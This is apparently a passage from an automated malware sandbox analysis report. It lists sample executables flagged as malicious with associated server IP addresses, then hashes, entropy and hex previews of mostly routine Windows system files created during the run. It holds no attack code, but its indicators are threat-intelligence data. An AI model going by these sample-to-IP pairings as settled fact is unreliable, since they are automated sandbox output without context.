	V0fj18mCES.exe	Get hash	malicious	Browse	116.202.178.170
	e0PQUVcp59.exe	Get hash	malicious	Browse	148.251.234.93
	D2MMAYEwZi.exe	Get hash	malicious	Browse	138.201.198.8
	Wa3bG9m1e0.exe	Get hash	malicious	Browse	116.202.178.170
	U2gArCYu2G.exe	Get hash	malicious	Browse	116.202.178.170
	Dr71GWpVkM.exe	Get hash	malicious	Browse	95.217.244.216
	Sj7u49y5qF.exe	Get hash	malicious	Browse	95.217.244.216
	1Oc7iKULkt.exe	Get hash	malicious	Browse	95.217.244.216
	4mVmfQ2yWc.exe	Get hash	malicious	Browse	95.217.244.216
	uFrCv7RvOD.exe	Get hash	malicious	Browse	95.217.244.216
	bZRL42bYlO.exe	Get hash	malicious	Browse	148.251.234.83

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.3593198815979092
Encrypted:	false
SSDEEP:	12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
MD5:	BF1DC7D5D8DAD7478F426DF8B3F8BAA6
SHA1:	C6B0BDE788F553F865D65F773D8F6A3546887E42
SHA-256:	BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
SHA-512:	00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
Malicious:	false
Preview:	.......................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MPEG-4 LOAS
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.24943090485914662
Encrypted:	false
SSDEEP:	1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4p:BJiRdwfu2SRU4p
MD5:	7B0A245903954CECA5936DC72D8030E4
SHA1:	B0B81C20EC1A98F1915A55F310A72C73FA4AE086
SHA-256:	DA90BBE594CF5B31C1FBFA6E642EB02D20486922405DAD2F40B502003188E302
SHA-512:	00D2D2CA9004E80E9E1C48ABEE4523C856CC90778C5D8E24ED3DE1683BED761CD834AA03F2AE2BE9B48E799BADE2961BB802870F73FB88A44F5EDA89687AB501
Malicious:	false
Preview:	V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x164c1cd1, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	786432
Entropy (8bit):	0.2506573808454337
Encrypted:	false
SSDEEP:	384:KTf+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:KT0SB2nSB2RSjlK/+mLesOj1J2
MD5:	B79F46474F134B257B317A14DFFDBE8D
SHA1:	E7103E859D6A68AC103A5E052D110C80BEDE1F13
SHA-256:	B7038E4598E8CB446466ADC2D2381D2364FEEBB5EDAF47935D9D6EBAB38132E3
SHA-512:	9F3A3608CA176075EB58D699B6CD3893A2A01B6E222A7032BA1234A3B474625DB2DE3F399CFF00B296AC2E5EFCB1298452FD5C4A2C593564E6B595B4CD32373D
Malicious:	false
Preview:	.L..... ................e.f.3...w........................).....8-...z..-*...zQ.h.(.....8-...z....)..............3...w...........................................................................................................B...........@...................................................................................................... ......................................................................................................................................................................................................................................................O8-...z...................h.@8-...z..........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.0762272795577358
Encrypted:	false
SSDEEP:	3:AD7vIPi+qDtl/ck2tdvEtFsSMo01Ixtl/ill3Vkttlmlnl:ADrIq+qDtlUk2tdctFsSMo0Gtle3
MD5:	8E906FFF47B27DE5D57F8FFF516F6583
SHA1:	B1CD8FEA1CEB20D4F6244E54C93EAE5E42007365
SHA-256:	1AE46A910AED94C65DC9362146BC1FDBE03451E454F54175955FBD441A708D55
SHA-512:	A2621D8A20105CF688249FF4301CA743EAB6896CEF216739F92D83F1EE2F7460BF5F957F974D12E5E028A04A8F9F02F0EC2B5CD737E034F075ADD4A77C42B1E1
Malicious:	false
Preview:	.WY......................................3...w..-*...zQ.8-...z..........8-...z..8-...z....IC7-...z.u.................h.@8-...z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_99e4cc34952fe878588783efe1b659fd6a7d99c_7cac0383_160a9aca\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7212701355210085
Encrypted:	false
SSDEEP:	96:foWi44nYyky9haym7tNfwbpXIQcQSc6mcEUcw3/s+a+z+HbHgoFVG4rmMoVazWbd:Qnn9VHsieryjNLq/u7sjzS274ItW
MD5:	ADB64B3CF562AC409B88889C1D14F91F
SHA1:	B191E726F1628FD22B6DCB4DDAFFE2D6937EA9CE
SHA-256:	FE4547533A841FFF1EF48A5FE31BD157FFB41D2E036C40D89AAEB3B8B098322C
SHA-512:	91BEB487E77B9AF3D582B599DE3D1B6EBA37778D9A4B596302EBA2DF6327FAA11D0C910DF88D0CDA242F77362880970B02973994C29B258DCD274AD89901E6EB
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.3.8.6.0.1.7.0.8.5.5.5.4.5.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.c.4.b.8.8.5.4.-.9.7.d.6.-.4.7.d.a.-.a.e.b.b.-.a.d.5.6.a.d.b.4.5.6.a.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.b.7.a.7.a.f.c.-.5.c.4.b.-.4.1.a.e.-.8.8.a.3.-.b.1.8.0.6.e.9.6.6.3.0.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.c.c.-.0.0.0.1.-.0.0.1.d.-.5.7.0.4.-.6.4.2.9.e.7.a.5.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.2././.1.3.:.0.9.:.0.7.:.1.6.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER922F.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Mon Aug 1 20:42:51 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	40854
Entropy (8bit):	2.0346024499082658
Encrypted:	false
SSDEEP:	192:fvVHEEOaTizvVFanAZhGBG9G6zkYQF9nmR:FkL26vVFanAPGBqG6zkYQF9M
MD5:	59C6397F9B596DA322C709D5E2B2D358
SHA1:	7BD70BEFC82A3AF8A1F63A8431AA1909731535DE
SHA-256:	E97253497CBF0F1B1AC5C26AEA3C46F34519E0020AE0B4742E9AF8E6D9622582
SHA-512:	B339FAED7CC8B37F40CEFCDD97461BA930A82CD17AE879BC422F9C6A4ADCC58D9B8A9EF85A2E82D08F6D19A134AF6E53FE21CE38500C9C2EBCBFC3BD0423DEAD
Malicious:	false
Preview:	MDMP....... ........:.b........................t...........$...............\ ..........`.......8...........T..........................@...........,....................................................................U...........B..............GenuineIntelW...........T............:.b.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER96B4.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8278
Entropy (8bit):	3.6891360469438688
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiCF606YWhSUYpGgmfPySwGbMCpBR89bqTsftum:RrlsNiY606YgSUYpGgmfKSwCIq4f9
MD5:	F54ABFD6BE208152184F9EE546D23FE4
SHA1:	299CAC7EF0419093327F8675F7AFB1972C0CE741
SHA-256:	5788F82C978B41FDFA0599E468774A13349546F22505B356DE17B1714347A247
SHA-512:	BE46FB803116EF261720954AF49F011D173D75542AC53CE75A52BC857E85AAFB3BA16F13E1DE9E6F5A3B73E1870E4773410DBCBD3B83F3AFFC5E6320DF813C83
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.8.3.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9907.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4550
Entropy (8bit):	4.416960359548232
Encrypted:	false
SSDEEP:	48:cvIwSD8zsWJgtWI9FfhWgc8sqYjE8fm8M4J2+HF8fV+q84QFuKcQIcQw0pd:uITfsK4grsqYVJcfVFKkw0pd
MD5:	CA8D8DE383C63D8EAB24BD9D26358D4E
SHA1:	9E064CE4ECF87F4A75FCE25079C372616B873922
SHA-256:	1D42E5DAA949EA0CE3F93B3866903AAE27092FEF34530FFC48BDAAD2CF34A522
SHA-512:	9979E0B0CB3DF99DF0D9F2216B1492DD42252506BEFB6DD3CC568884E988D410B1522543E2D24F2AF7C03A2D8089BB591A47CDC03D354D364B51EE6DF6B4B398
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1628993" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\USOPrivate\UpdateStore\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml (copy)

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2494
Entropy (8bit):	5.234932660839943
Encrypted:	false
SSDEEP:	48:cAn/TLtfiiAoLeMp/B8BSfSkC9+TILdps:pTLtfrAoukEs
MD5:	5C8A3C42100ED07F00D41FEB7B2FB7C1
SHA1:	6C0A54CBFD38682C43B586A861550EF33EF8A2E4
SHA-256:	D687E70B8B92A11AD6884CA25EE81ED1190972431E83034C9A341772B650CD05
SHA-512:	1AC1C8DAE1B1D0261F852E4AF4C29A2E9B4A49C8445B9E0CF4C22F95A79F70EC718F036759BB6A06D7ECD7434E11D5D23B9FB27272F3FD257568E77CE304AE4D
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?><updateStore><sessionVariables><permanent><AUOptions dataType="3">1</AUOptions><AllowMUUpdateService dataType="3">0</AllowMUUpdateService><AreUpdatesPausedByPolicy dataType="11">False</AreUpdatesPausedByPolicy><AttentionRequiredReason dataType="19">0</AttentionRequiredReason><CurrentState dataType="19">1</CurrentState><FirstScanAttemptTime dataType="21">132399969272148706</FirstScanAttemptTime><FlightEnabled dataType="3">0</FlightEnabled><LastError dataType="19">0</LastError><LastErrorState dataType="19">0</LastErrorState><LastErrorStateType dataType="11">False</LastErrorStateType><LastMeteredScanTime dataType="21">132399969272304939</LastMeteredScanTime><LastScanAttemptTime dataType="21">132399969272148706</LastScanAttemptTime><LastScanDeferredReason dataType="19">1</LastScanDeferredReason><LastScanDeferredTime dataType="21">132768328383669698</LastScanDeferredTime><LastScanFailureError dataType="3">-2147023838</LastScanFailureError><LastScanFailu

C:\ProgramData\USOPrivate\UpdateStore\updatestoretemp51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2494
Entropy (8bit):	5.234932660839943
Encrypted:	false
SSDEEP:	48:cAn/TLtfiiAoLeMp/B8BSfSkC9+TILdps:pTLtfrAoukEs
MD5:	5C8A3C42100ED07F00D41FEB7B2FB7C1
SHA1:	6C0A54CBFD38682C43B586A861550EF33EF8A2E4
SHA-256:	D687E70B8B92A11AD6884CA25EE81ED1190972431E83034C9A341772B650CD05
SHA-512:	1AC1C8DAE1B1D0261F852E4AF4C29A2E9B4A49C8445B9E0CF4C22F95A79F70EC718F036759BB6A06D7ECD7434E11D5D23B9FB27272F3FD257568E77CE304AE4D
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?><updateStore><sessionVariables><permanent><AUOptions dataType="3">1</AUOptions><AllowMUUpdateService dataType="3">0</AllowMUUpdateService><AreUpdatesPausedByPolicy dataType="11">False</AreUpdatesPausedByPolicy><AttentionRequiredReason dataType="19">0</AttentionRequiredReason><CurrentState dataType="19">1</CurrentState><FirstScanAttemptTime dataType="21">132399969272148706</FirstScanAttemptTime><FlightEnabled dataType="3">0</FlightEnabled><LastError dataType="19">0</LastError><LastErrorState dataType="19">0</LastErrorState><LastErrorStateType dataType="11">False</LastErrorStateType><LastMeteredScanTime dataType="21">132399969272304939</LastMeteredScanTime><LastScanAttemptTime dataType="21">132399969272148706</LastScanAttemptTime><LastScanDeferredReason dataType="19">1</LastScanDeferredReason><LastScanDeferredTime dataType="21">132768328383669698</LastScanDeferredTime><LastScanFailureError dataType="3">-2147023838</LastScanFailureError><LastScanFailu

C:\Windows\Logs\waasmedic\waasmedic.20220801_204255_503.etl

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	2.740366961833745
Encrypted:	false
SSDEEP:	48:N1SsGur52AXEb7kU0b7kEnb7kl1b7kdb7kbIl9lPb7k0tplpb7kGb7kkb7kwgNbH:CQ2yE0U00g0b0d0U9Z0Clp0G0k0NN09O
MD5:	2F01500A1F97DA475C9D6A3CF839CADE
SHA1:	C3E7F6855F64C80E18244B77251FF742B9B39FDB
SHA-256:	B1F65AAAB7A8049FDEFB8CC3DDA1AECC3CEF07CF0FCB3BEE3542DD4922C22FE6
SHA-512:	4FF96D0512771381327D3F17B58A2DD8CA7FD176CED35FFDA8C0DCF9D35B8C0DA669D5896A7EE3C587EB258A6F60D1A26FF941C899C566BEE24F8F4311A7FCA9
Malicious:	false
Preview:	....................................................!...........................4........t.......................B.........j...Zb....... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................D.s..3.... .....]..G...........E.C.C.B.1.7.5.F.-.1.E.B.2.-.4.3.D.A.-.B.F.B.5.-.A.8.D.5.8.A.4.0.A.4.D.7...C.:.\.W.i.n.d.o.w.s.\.l.o.g.s.\.w.a.a.s.m.e.d.i.c.\.w.a.a.s.m.e.d.i.c...2.0.2.2.0.8.0.1._.2.0.4.2.5.5._.5.0.3...e.t.l.............P.P.4........t..................................................................9.B..t......17134.1.amd64fre.rs4_release.180410-1804............5.@..t......OYo."(.s..O........WaaSMedicSvc.pdb............................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	9062
Entropy (8bit):	3.164876514129182
Encrypted:	false
SSDEEP:	192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3zB+/:j+s+v+b+P+m+0+Q+q+C+/
MD5:	62DBF0D96F527459C7A2534BC9A1CCCE
SHA1:	FDD61B4F9350CB779383755A8EDC06168DCBD751
SHA-256:	E723F6202290E542DD6E4CFAFCE876F62B5A08CBD1B1C604C6119D5DAC6B368F
SHA-512:	13273A673CDAFFFF2A8D5D4462D34A2C957F708CD9C6971061334FC9D1235B2C2A85C37C11A1C04D86C457D02584349FBEAB50AEA21DB21D7CC6B80B769BE90B
Malicious:	false
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.

C:\Windows\SoftwareDistribution\DataStore\DataStore.edb

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xec7260e4, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	12058624
Entropy (8bit):	3.2661983594628037
Encrypted:	false
SSDEEP:	49152:xlv5daaV7EyaUFzdGZYpdaC6l2UYWsjAr+dnXsSDoIA6:37EyaUFzdGZYpd+YlU+e
MD5:	525790A0DCE85983CE6669CA7A6843DA
SHA1:	7C48E757489E68E8F263C9864DEA992633C3BCC4
SHA-256:	D921651C52B11FDD47CAD24F16E76A4F4753B783DCFA6A3CC78B3570E73A4963
SHA-512:	388C8BA4309C042EFA15135A9A89E79B7B95DE88B270210CE5272E11170F48C6DF1C47DD2D4633DD454E60E22A0B61F795B52CFBDA700463534047F225B1EE55
Malicious:	false
Preview:	.r`.... ................=~.#4...w......................1.......&,...z).),...z).h...........................8.Dv#4...wm.............................................................................................]............B...........@...................................................................................................... ......."....w......................................................................................................................................................................................................................................q...),...z){....................),...z).........................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.20920948052015417
Encrypted:	false
SSDEEP:	6:PS/CwsteplgaDp7H3yslekaElLh/71lpr9moLHafRrigmtnn/t0PiRM8oKBXlH0t:sCwst2lV9jdldFDpQomJugmEyM85U
MD5:	20D757F93C3CB57E582BB5231E4F7D83
SHA1:	03A681990EF30015146DF6C64578CD3BFF9FE9EA
SHA-256:	353FB6A188ABB18CB0EDCE9CF5CB2A449E8EF02095746C22CD2FE0D43AEAA4C3
SHA-512:	BEE12704CD99FEE735D05CE47BE65D70F5B03A57E49F2B8203DD6D29E969F7B3AA4DA1D2FFE8CA542896A0C35174311551B254B5A514B61E05C0CA0A9E45FAD7
Malicious:	false
Preview:	...m....................................#4...w..#,...zm.&,...z).........$,...z..&,...z).....%,...z5w................M.Zs&,...z).........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.37208809033350065
Encrypted:	false
SSDEEP:	6:QHAom/cWGom/cWSQmDoHAom/cWGom/cWSQmD:pCWGCWSQQBCWGCWSQQ
MD5:	0F7B04BEC5B99CB1CAB8AE99C148E894
SHA1:	3589D9D82F2E712BA7964ACB9D0F86FFF11DBAAD
SHA-256:	D03F104F97F648F753BD418917C3A7ABC7F95A4E941B86DA0D3B610E88A8A93D
SHA-512:	A06D245C015B9EB8329BE229F3482654FB50D675D02BFE4F3EF667FDCAE82455B32BE570E56257F9737D2920993EB47A7EDAD2C2E34253AF6F460263C8317C09
Malicious:	false
Preview:	)..O................8.Dv#4...wm.................C:\Windows\SoftwareDistribution\DataStore\Logs\......................................................................................................................................................................................................................C:\Windows\SoftwareDistribution\DataStore\Logs\.......................................................................................................................................................................................................................0u..................@...@....................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	4.4149553203716705
Encrypted:	false
SSDEEP:	12288:FSFh5+KR+caGS4/OUvOUA0zSAZSKea+6V4g:F0R++OUvOUA0uAjTG
MD5:	2C618886A6A43C382344794EC017FF41
SHA1:	DE323B532511D1D373016576465BCABEB7EE6A71
SHA-256:	91E3F7A25EC47145EA4F3DF4A8B7B3AFB4D678E2BC3CD55DE8B8F99411248B56
SHA-512:	847B411A4E0A51B356CAA824EE8A782AE71EB56DE05F121D74C95F9EC4B9ACC32FC556988D071C0ADD2B6727EDE0406C34CBECF61EC29721A03652070F3BE182
Malicious:	false
Preview:	8L>*........@..@"....w.......w..............8.Dv#4...wm.................C:\Windows\SoftwareDistribution\DataStore\Logs\......................................................................................................................................................................................................................C:\Windows\SoftwareDistribution\DataStore\Logs\.......................................................................................................................................................................................................................0u..................@...@......................6...........l._M(.Wd#......... p.........H.......h.7.....k.4......=~.#4...w..................C.:.\.W.i.n.d.o.w.s.\.S.o.f.t.w.a.r.e.D.i.s.t.r.i.b.u.t.i.o.n.\.D.a.t.a.S.t.o.r.e.\.D.a.t.a.S.t.o.r.e...e.d.b............................................................................................................................................................

C:\Windows\SoftwareDistribution\SLS\9482F4B4-E343-43B6-B170-9A65BC822C77\TMP46AC.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Microsoft Cabinet archive data, 6846 bytes, 1 file
Category:	dropped
Size (bytes):	25638
Entropy (8bit):	7.661017371907356
Encrypted:	false
SSDEEP:	384:jdDP5jIIAjdmdH9mfrggo4eCFYj9R9zPjKeCr2wR9zeOnc:dPiIAjdmN9wXoiYj/9zuR2M9zpc
MD5:	9890A6F691B098E22BA772E942F0A04E
SHA1:	09B8BAF682591B5F446AB952A1D4E323A32B18FB
SHA-256:	26B45563575B9E468D2598563730842CBD0B856084C90CA2DB29D7252A9CD389
SHA-512:	C7DCCE0AB7C98C50A1C80BF232AD04A1E5B26AFF6559F29D5B8BF5A263C94A9BCA77F60D3528BBF23A1D4D908EBD6FA1D3C35D5578D85DA574310C64B319A46D
Malicious:	false
Preview:	MSCF............D...............[7..............hI..........d........4..............environment.xml.v.n.R..4CK.y....J......o..v4....}......xV../.G.%[~.....]@........._.._...o[6.............V}...u.?.........a..8.......)......W}:.....Y6...../v6mU.q.VMC.e....Hb..D...4..CP.3...g....I..h..a.z...^.....T[......8...~.]..N.l.D_......%.......?..2....y....i.d.uU2../.%C.l8..1..&...t..aZN..Q.g.y....v\|....m..l.Oo...y..e4.....+...Z.Z...]7..z.W..f./++.6Z..<..h...g...y9U.-....o.}..OQ.>k.*...[7.....5..Oo[.Vg.u....[..k\g...o.O}....\|.I.C...A...).....?+..[F...[..a.......N.!.[........g.\|..70yC..8yC.7...`...eiuv.d...Gs..g.=...J.H;.C.pA..M........G..[..I}\|...y.M%.;HS..S,CW,..T#P....x.......;.:L...\.q..1.>9..]K....P...3.bM%..... ..d.24.#.~....nq.T...z...u.G.....[....{..n.....-..F.....&..:.....:........&....G....j..................Z.y0.DB....>>S..o.x...yM.k.r.J......qs....t<..uU....?.{..9.W.h[..w...n....!..vM.....B..?...c?q<E..U...u...e.."....'..Ab.Z..

C:\Windows\SoftwareDistribution\SLS\9482F4B4-E343-43B6-B170-9A65BC822C77\TMP4D47.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Microsoft Cabinet archive data, 6846 bytes, 1 file
Category:	dropped
Size (bytes):	25638
Entropy (8bit):	7.661017371907356
Encrypted:	false
